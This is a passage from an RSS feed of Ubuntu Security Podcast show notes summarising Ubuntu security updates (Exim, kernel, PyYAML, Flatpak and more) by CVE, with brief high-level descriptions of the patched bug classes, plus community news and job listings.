<h3 id="usn-4956-1-eventlet-vulnerability-08-05">[<a href="https://ubuntu.com/security/notices/USN-4956-1">USN-4956-1</a>] Eventlet vulnerability [08:05]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21419">CVE-2021-21419</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python eventlet (concurrent networking library)</li>
<li>Used by a lot of other packages including openstack etc</li>
<li>websocket peer could DoS via memory exhaustion by sending very large
websocket frames</li>
</ul>
<h3 id="usn-4957-1-usn-4957-2-djvulibre-vulnerabilities-08-31">[<a href="https://ubuntu.com/security/notices/USN-4957-1">USN-4957-1</a>, <a href="https://ubuntu.com/security/notices/USN-4957-2">USN-4957-2</a>] DjVuLibre vulnerabilities [08:31]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3500">CVE-2021-3500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32493">CVE-2021-32493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32492">CVE-2021-32492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32491">CVE-2021-32491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32490">CVE-2021-32490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>document format alternative to pdf - for storing scanned documents etc</li>
<li>c++ - memory corruption vulns
<ul>
<li>heap buffer overflow</li>
<li>oob write</li>
<li>stack buffer overflow</li>
<li>oob read</li>
<li>integer overflow</li>
<li>DoS/RCE</li>
</ul>
</li>
</ul>
<h3 id="usn-4958-1-caribou-vulnerability-09-27">[<a href="https://ubuntu.com/security/notices/USN-4958-1">USN-4958-1</a>] Caribou vulnerability [09:27]</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Groovy (20.10)</li>
<li>Caribou on-screen keyboard could crash if given crafted input - in some
cases, this would then cause the screensaver to crash -&gt; unauthenticated
access to a desktop session
<ul>
<li>Thanks to Fabio Fantoni and Joshua Peisach (itzswirlz) from the Ubuntu
community for preparing these updates</li>
</ul>
</li>
</ul>
<h3 id="usn-4959-1-gstreamer-base-plugins-vulnerability-10-11">[<a href="https://ubuntu.com/security/notices/USN-4959-1">USN-4959-1</a>] GStreamer Base Plugins vulnerability [10:11]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3522">CVE-2021-3522</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read on crafted input since failed to properly check size -&gt; DoS</li>
</ul>
<h3 id="usn-4945-2-linux-kernel--raspberry-pi--vulnerabilities-10-18">[<a href="https://ubuntu.com/security/notices/USN-4945-2">USN-4945-2</a>] Linux kernel (Raspberry Pi) vulnerabilities [10:18]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30002">CVE-2021-30002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29265">CVE-2021-29265</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28660">CVE-2021-28660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28375">CVE-2021-28375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28038">CVE-2021-28038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25639">CVE-2020-25639</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-115/">Episode 115</a> - regular kernels for Ubuntu 20.04 / 18.04 LTS</li>
<li>Update also for the raspi specific kernel build</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="1password-for-linux-officially-released-10-43">1Password for Linux officially released [10:43]</h3>
<ul>
<li><a href="https://ubuntusecuritypodcast.org/episode-86/">Episode 86</a> (August 2020) - beta was announced</li>
<li>Now officially released, includes integration with browser extension to
stay unlocked across both, use of regular desktop authentication to
unlock as well - e.g. fingerprint / yubikey etc - both opt-in features.</li>
<li>Great desktop integration, theme, clipboard, GNOME Keyring / KDE Wallet,
kernel keyring, DBUS API, integration with system lock / idle etc</li>
<li>Feature parity with Windows and MacOS clients PLUS extra features like
Secure file attachment, Watchtower, item archiving / deletion, quick find
and more</li>
<li>Uses kernel keyring to store the key used to establish the connection
between the browser and the desktop client</li>
<li>Backend and lots of underlying libs written in Rust - UI is React</li>
<li>Native packages for Ubuntu (Debian. CentOS, Fedora, RHEL)</li>
<li>Snap</li>
</ul>
<h3 id="hiring-13-56">Hiring [13:56]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E116.mp3" length="12145791" type="audio/mpeg" /><itunes:duration>15:09</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 115
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-115/</link>
          <pubDate>Fri, 14 May 2021 14:49:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>e41d16ec99942421046692700e4a2d653e64ec78845c8ddeb8d6c63e2957cfaa97aace439965772b61a85106d5a382b1e501cb69ae759ec1134601535c1aec7cHH</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 115</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.</itunes:summary>
        <description>This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.</description>
        <googleplay:description>This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>90 unique CVEs addressed</p>
<h3 id="usn-4934-2-exim-vulnerabilities-00-41">[<a href="https://ubuntu.com/security/notices/USN-4934-2">USN-4934-2</a>] Exim vulnerabilities [00:41]</h3>
<ul>
<li>16 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27216">CVE-2021-27216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28025">CVE-2020-28025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28024">CVE-2020-28024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28022">CVE-2020-28022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28020">CVE-2020-28020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28017">CVE-2020-28017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28016">CVE-2020-28016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28015">CVE-2020-28015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28014">CVE-2020-28014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28013">CVE-2020-28013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28012">CVE-2020-28012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28011">CVE-2020-28011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28009">CVE-2020-28009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28008">CVE-2020-28008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28007">CVE-2020-28007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28026">CVE-2020-28026</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-114/">Episode 114</a></li>
</ul>
<h3 id="usn-4937-1-gnome-autoar-vulnerability-01-00">[<a href="https://ubuntu.com/security/notices/USN-4937-1">USN-4937-1</a>] GNOME Autoar vulnerability [01:00]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28650">CVE-2021-28650</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Directory traversal due to failure to properly handle symlinks (result of
incomplete fix for previous <a href="https://ubuntu.com/security/CVE-2020-36241">CVE-2020-36241</a>)</li>
</ul>
<h3 id="usn-4936-1-thunderbird-vulnerabilities-01-47">[<a href="https://ubuntu.com/security/notices/USN-4936-1">USN-4936-1</a>] Thunderbird vulnerabilities [01:47]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29950">CVE-2021-29950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23978">CVE-2021-23978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23973">CVE-2021-23973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23969">CVE-2021-23969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23968">CVE-2021-23968</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>78.8.1</li>
<li>If used a PGP key but then a failure occurred, TB would keep the
decrypted key in memory - on Ubuntu we enable Yama ptrace restrictions
(ptrace_scope) - so this means processes can only ptrace their
descendents by default and hence even other user-level processes cannot
dump the memory of another process to say extract this private key</li>
<li>Various other CVEs inherited from Firefox</li>
</ul>
<h3 id="usn-4938-1-unbound-vulnerabilities-03-21">[<a href="https://ubuntu.com/security/notices/USN-4938-1">USN-4938-1</a>] Unbound vulnerabilities [03:21]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28935">CVE-2020-28935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25042">CVE-2019-25042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25041">CVE-2019-25041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25040">CVE-2019-25040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25039">CVE-2019-25039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25038">CVE-2019-25038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25037">CVE-2019-25037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25036">CVE-2019-25036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25035">CVE-2019-25035</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25034">CVE-2019-25034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25033">CVE-2019-25033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25032">CVE-2019-25032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-25031">CVE-2019-25031</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Validating, recursive DNS resolver</li>
<li>Remote DoS, command injection, RCE, local file overwrite etc</li>
</ul>
<h3 id="usn-4939-1-webkitgtk-vulnerabilities-03-48">[<a href="https://ubuntu.com/security/notices/USN-4939-1">USN-4939-1</a>] WebKitGTK vulnerabilities [03:48]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1871">CVE-2021-1871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1844">CVE-2021-1844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1788">CVE-2021-1788</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 logic issue, 2 memory corruption bugs - all leading to possible RCE</li>
</ul>
<h3 id="usn-4940-1-pyyaml-vulnerability-04-12">[<a href="https://ubuntu.com/security/notices/USN-4940-1">USN-4940-1</a>] PyYAML vulnerability [04:12]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14343">CVE-2020-14343</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE when processing untrusted YAML - due to incomplete fix for previous
<a href="https://ubuntu.com/security/CVE-2020-1747">CVE-2020-1747</a> - that CVE not specifically patched in Ubuntu as either the
versions of pyyaml were too old to be affected or were based on upstream
releases that had already patched it</li>
</ul>
<h3 id="usn-4941-1-exiv2-vulnerabilities-04-35">[<a href="https://ubuntu.com/security/notices/USN-4941-1">USN-4941-1</a>] Exiv2 vulnerabilities [04:35]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3482">CVE-2021-3482</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29470">CVE-2021-29470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29458">CVE-2021-29458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29457">CVE-2021-29457</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>EXIF/IPTC/XMP metadata manipulation tool</li>
<li>Heap buffer overflow or OOB read when writing metadata - so not so likely
to be triggered by applications that are just extracting metadata etc</li>
<li>Heap buffer overflow for handling EXIF in JPG images</li>
</ul>
<h3 id="usn-4942-1-firefox-vulnerability-05-09">[<a href="https://ubuntu.com/security/notices/USN-4942-1">USN-4942-1</a>] Firefox vulnerability [05:09]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29952">CVE-2021-29952</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>88.0.1</li>
<li>Race condition on destruction of WebRender components -&gt; UAF? -&gt; possible RCE</li>
</ul>
<h3 id="usn-4943-1-xstream-vulnerabilities-05-32">[<a href="https://ubuntu.com/security/notices/USN-4943-1">USN-4943-1</a>] XStream vulnerabilities [05:32]</h3>
<ul>
<li>14 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21351">CVE-2021-21351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21350">CVE-2021-21350</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21349">CVE-2021-21349</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21348">CVE-2021-21348</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21347">CVE-2021-21347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21346">CVE-2021-21346</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21345">CVE-2021-21345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21344">CVE-2021-21344</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21343">CVE-2021-21343</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21342">CVE-2021-21342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21341">CVE-2021-21341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26259">CVE-2020-26259</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26258">CVE-2020-26258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26217">CVE-2020-26217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-102/">Episode 102</a> - B+F - corresponding fixes for those 3 CVEs for G</li>
<li>Also a heap of others - denial of service, arbitrary code execution,
arbitrary file deletion and server-side forgery attacks</li>
</ul>
<h3 id="usn-4944-1-mariadb-vulnerabilities-06-04">[<a href="https://ubuntu.com/security/notices/USN-4944-1">USN-4944-1</a>] MariaDB vulnerabilities [06:04]</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)</li>
<li>Latest upstream point releases rolling in a large number of security fixes:
<ul>
<li>Ubuntu 18.04 LTS has been updated to MariaDB 10.1.48.</li>
<li>Ubuntu 20.04 LTS has been updated to MariaDB 10.3.29.</li>
<li>Ubuntu 20.10 has been updated to MariaDB 10.3.29.</li>
<li>Ubuntu 21.04 has been updated to MariaDB 10.5.10.</li>
<li>Thanks to Otto Kekäläinen from the MariaDB foundation for contributing
and preparing these updates</li>
</ul>
</li>
</ul>
<h3 id="usn-4945-1-linux-kernel-vulnerabilities-06-33">[<a href="https://ubuntu.com/security/notices/USN-4945-1">USN-4945-1</a>] Linux kernel vulnerabilities [06:33]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30002">CVE-2021-30002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29265">CVE-2021-29265</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28660">CVE-2021-28660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28375">CVE-2021-28375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28038">CVE-2021-28038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25639">CVE-2020-25639</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (standard kernel for 20.04 LTS, HWE for 18.04 LTS)</li>
</ul>
<h3 id="usn-4946-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4946-1">USN-4946-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30002">CVE-2021-30002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29265">CVE-2021-29265</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29264">CVE-2021-29264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28688">CVE-2021-28688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28038">CVE-2021-28038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26931">CVE-2021-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26930">CVE-2021-26930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20292">CVE-2021-20292</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (standard kernel for 18.04 LTS, HWE for 16.04 ESM, Azure for 14.04
ESM)</li>
</ul>
<h3 id="usn-4947-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4947-1">USN-4947-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30002">CVE-2021-30002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29646">CVE-2021-29646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28375">CVE-2021-28375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35519">CVE-2020-35519</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.6 (OEM for 20.04 LTS)</li>
</ul>
<h3 id="usn-4948-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4948-1">USN-4948-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>21 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3483">CVE-2021-3483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31916">CVE-2021-31916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29657">CVE-2021-29657</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29649">CVE-2021-29649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29647">CVE-2021-29647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29646">CVE-2021-29646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29266">CVE-2021-29266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29264">CVE-2021-29264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28972">CVE-2021-28972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28971">CVE-2021-28971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28964">CVE-2021-28964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28952">CVE-2021-28952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28951">CVE-2021-28951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28688">CVE-2021-28688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25672">CVE-2020-25672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25671">CVE-2020-25671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25670">CVE-2020-25670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3491">CVE-2021-3491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3490">CVE-2021-3490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3489">CVE-2021-3489</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.10 (OEM for 20.04 LTS)</li>
<li>3 Pwn2Own vulnerabilities
<ul>
<li>Ryota Shiga - eBPF ring buffer</li>
<li>Manfred Paul - eBPF bounds tracking on bitwise operations</li>
<li>Billy Jheng Bing-Jhong - io_uring
<ul>
<li>All OOB writes + info leaks -&gt; local priv esc + code execution as
root</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4949-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4949-1">USN-4949-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29650">CVE-2021-29650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29646">CVE-2021-29646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29266">CVE-2021-29266</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29265">CVE-2021-29265</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29264">CVE-2021-29264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28375">CVE-2021-28375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26931">CVE-2021-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26930">CVE-2021-26930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25639">CVE-2020-25639</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3491">CVE-2021-3491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3490">CVE-2021-3490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3489">CVE-2021-3489</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.8 (standard kernel for 20.10, HWE for 20.04 ESM, Azure for 14.04
ESM)</li>
</ul>
<h3 id="usn-4950-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4950-1">USN-4950-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3491">CVE-2021-3491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3490">CVE-2021-3490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3489">CVE-2021-3489</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11</li>
<li>Plus CAN ISOTP race condition - discovered by a Norbert Slusarek (high
school student in Germany) - local privilege escalation
<ul>
<li>Introduced via recent broadcast mode support (normally a CAN socket
registers a particular CAN ID to receive and only gets those frames -
was only in 5.11 kernel so only affected hirsute) - this support has
been removed from the hirsute kernel until a proper fix comes from
upstream</li>
</ul>
</li>
</ul>
<h3 id="usn-4951-1-flatpak-vulnerability-10-16">[<a href="https://ubuntu.com/security/notices/USN-4951-1">USN-4951-1</a>] Flatpak vulnerability [10:16]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21381">CVE-2021-21381</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>File forwarding issue which could allow an attacker to get access to
files that are not normally provided by the permissions granted to an app</li>
<li>Use special tokens in the Exec line of the desktop file for an app could
trick flatpak runtime into providing access to a file as though this had
been explicitly granted by the user
<ul>
<li>snapd generates desktop files so less likely to be affected by this
sort of issue - less untrusted input in general (but perhaps also less
flexible)</li>
</ul>
</li>
</ul>
